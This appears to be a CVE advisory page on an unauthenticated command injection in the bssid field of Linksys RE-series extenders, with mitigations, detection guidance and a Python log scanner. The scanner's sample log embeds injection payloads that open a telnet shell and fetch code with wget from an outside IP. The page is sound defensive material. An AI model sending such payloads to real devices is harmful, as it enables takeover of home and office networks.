CVE-2025-8821

6.3 MEDIUM

📋 TL;DR

CVE-2025-8821 is an OS command injection in the web management interface of Linksys RE-series range extenders. The bssid parameter of the /goform/RP_setBasic handler is used to build an operating-system command without sanitisation, so a remote attacker who can reach the interface can inject arbitrary commands. Firmware builds up to 20250801 on the models listed below are affected. The endpoint requires no authentication, so a successful attack can take full control of the device.

💻 Affected Systems

Products:
  • Linksys RE6250
  • Linksys RE6300
  • Linksys RE6350
  • Linksys RE6500
  • Linksys RE7000
  • Linksys RE9000
Versions: All versions up to 20250801
Operating Systems: Embedded Linux firmware
Default Config Vulnerable: ⚠️ Yes
Notes: All default configurations are vulnerable as the vulnerable endpoint is accessible without authentication.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise: a persistent backdoor on the extender, pivoting from it into the internal network, and exfiltration of data that transits the device.

🟠 Likely Case

Device takeover for botnet recruitment, credential harvesting from connected clients, or network disruption.

🟢 If Mitigated

Limited impact if the management interface is unreachable from the Internet and the extender sits on a segmented network with strict inbound filtering.

🌐 Internet-Facing: HIGH - remotely exploitable without authentication, and public exploit details exist.
🏢 Internal Only: MEDIUM - the vulnerable endpoint is on the LAN-side web interface, so any host on the same network (including an already compromised client) can exploit it and use the extender as a pivot.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Proof-of-concept exploit is publicly available on GitHub, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: Unknown (no patch published yet)

Instructions:

No official patch was available at the time of writing. Check the Linksys support site for firmware updates for the listed models that reference CVE-2025-8821 or carry a build date later than 20250801.

🔧 Temporary Workarounds

Network Segmentation (all models)

Put the range extenders on a dedicated management VLAN and block access to their web interface (TCP/80 and, if enabled, TCP/443) from the Internet and from untrusted client segments.

Access Control (all models)

The extender itself offers no per-URL access control, so the /goform/RP_setBasic endpoint cannot be blocked on the device. Enforce the restriction upstream instead: on the firewall in front of the extender, allow HTTP to its management address only from a designated management host or subnet.

🧯 If You Can't Patch

  • Disable remote (WAN-side) management on affected devices; this removes Internet exposure but not exposure from the local network, where the endpoint remains reachable
  • Replace vulnerable devices with a model for which fixed firmware exists, if one is available

🔍 How to Verify

Check if Vulnerable:

Check the firmware build date in the web interface (typically Administration > Firmware Update). A build dated on or before 20250801 is vulnerable.

Check Version:

No CLI command available. Use web interface: http://[device-ip]/FirmwareUpdate.htm

Verify Fix Applied:

Confirm the firmware build date is later than 20250801, or matches the patched version named in the vendor advisory once one is published.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /goform/RP_setBasic whose bssid parameter, after percent-decoding, is not a plain MAC address or contains shell metacharacters (; & | ` $ ( )); collect this from a proxy or packet capture in front of the management interface rather than from the extender's own logs
  • Unexpected process execution from the web server context (telnetd, wget, busybox shells spawned by the httpd process)

Network Indicators:

  • HTTP requests to the extender carrying shell commands in the query string or POST body, usually percent-encoded (for example %3B for ; and %60 for `)
  • Outbound connections from range extenders to unexpected external hosts, such as second-stage downloads or reverse shells

SIEM Query (pseudo-syntax; adapt to your platform, and percent-decode the parameter before matching, otherwise an encoded %3B never hits the character class):

source="linksys-extender" AND (url="/goform/RP_setBasic" AND (param="bssid" AND value MATCHES "[;&|`$()]"))
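The detection logic above, written out as an added example (this is not Linksys code and not from the original advisory). It assumes the extender's web interface sits behind a logging reverse proxy or packet capture that records each request as an access-log line with the POST body appended after a tab; the line layout, field names and sample entries below are constructed for this example. It goes one step further than the metacharacter regex: it percent-decodes the bssid value first and treats anything that is not a bare MAC address as suspicious, which also catches payloads that avoid the listed characters.

```python
"""Flag command-injection attempts against /goform/RP_setBasic.

Added example for this advisory, not Linksys code.  Assumes a logging proxy
or capture in front of the extender writes one access-log line per request
with the POST body appended after a tab (constructed layout, see LINE_RE).
"""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/goform/RP_setBasic"
# A legitimate bssid is a MAC address: six hex octets separated by colons.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
# Characters that let a value break out of a shell command built from it.
SHELL_META_RE = re.compile(r"[;&|`$(){}<>\n]")
# <src> - [<timestamp>] "<method> <target> HTTP/x" <status>[<tab><body>]
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
    r'(?:\t(?P<body>.*))?$'
)

# Constructed sample log: a benign POST, two percent-encoded injection
# attempts, a benign GET with the parameter in the query string, a malformed
# value, and a request to an unrelated handler that must be ignored.
SAMPLE_LOG = (
    '192.168.1.50 - [01/Aug/2025:10:00:01 +0000] "POST /goform/RP_setBasic HTTP/1.1" 200'
    '\tbssid=aa%3Abb%3Acc%3Add%3Aee%3Aff&ssid=Home\n'
    '192.168.1.77 - [01/Aug/2025:10:00:09 +0000] "POST /goform/RP_setBasic HTTP/1.1" 200'
    '\tbssid=aa%3Abb%3Acc%3Add%3Aee%3Aff%3Btelnetd%20-l%20%2Fbin%2Fsh&ssid=Home\n'
    '192.168.1.77 - [01/Aug/2025:10:00:12 +0000] "POST /goform/RP_setBasic HTTP/1.1" 200'
    '\tbssid=%60wget+http%3A%2F%2F198.51.100.7%2Fx%60&ssid=Home\n'
    '192.168.1.50 - [01/Aug/2025:10:01:00 +0000] '
    '"GET /goform/RP_setBasic?bssid=aa:bb:cc:dd:ee:ff HTTP/1.1" 200\t-\n'
    '192.168.1.60 - [01/Aug/2025:10:01:30 +0000] "POST /goform/RP_setBasic HTTP/1.1" 200'
    '\tbssid=00%3A11%3A22%3A33%3A44&ssid=Home\n'
    '192.168.1.50 - [01/Aug/2025:10:02:00 +0000] "POST /goform/RP_setOther HTTP/1.1" 200'
    '\tbssid=x%3Bid\n'
)


def bssid_values(method, target, body):
    """Return every bssid value sent to ENDPOINT, percent-decoded, taken from
    the query string and, for POST, from the form body.  Other paths yield []."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("bssid", [])
    if method == "POST" and body and body != "-":
        values += parse_qs(body, keep_blank_values=True).get("bssid", [])
    return values


def classify(value):
    """'ok' for a bare MAC address; 'injection' if the decoded value carries
    shell metacharacters; otherwise 'malformed' (worth a look, not confirmed)."""
    if MAC_RE.match(value):
        return "ok"
    if SHELL_META_RE.search(value):
        return "injection"
    return "malformed"


def scan(log_text):
    """Return (src, timestamp, verdict, decoded_bssid) for every non-'ok'
    bssid value found in log_text."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for value in bssid_values(m["method"], m["target"], m["body"]):
            verdict = classify(value)
            if verdict != "ok":
                hits.append((m["src"], m["ts"], verdict, value))
    return hits


if __name__ == "__main__":
    for src, ts, verdict, value in scan(SAMPLE_LOG):
        print(f"{ts} {src} {verdict}: bssid={value!r}")
```

Decoding before matching is the important detail: parse_qs turns %3B back into ; and + into a space, so the encoded payloads in lines two and three are caught, while the same regex applied to the raw line would miss both. Treating "not a MAC address" as the alert condition rather than "contains a metacharacter" keeps the rule useful if an attacker finds a payload that avoids the listed characters; the malformed verdict on the five-octet value shows the difference.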
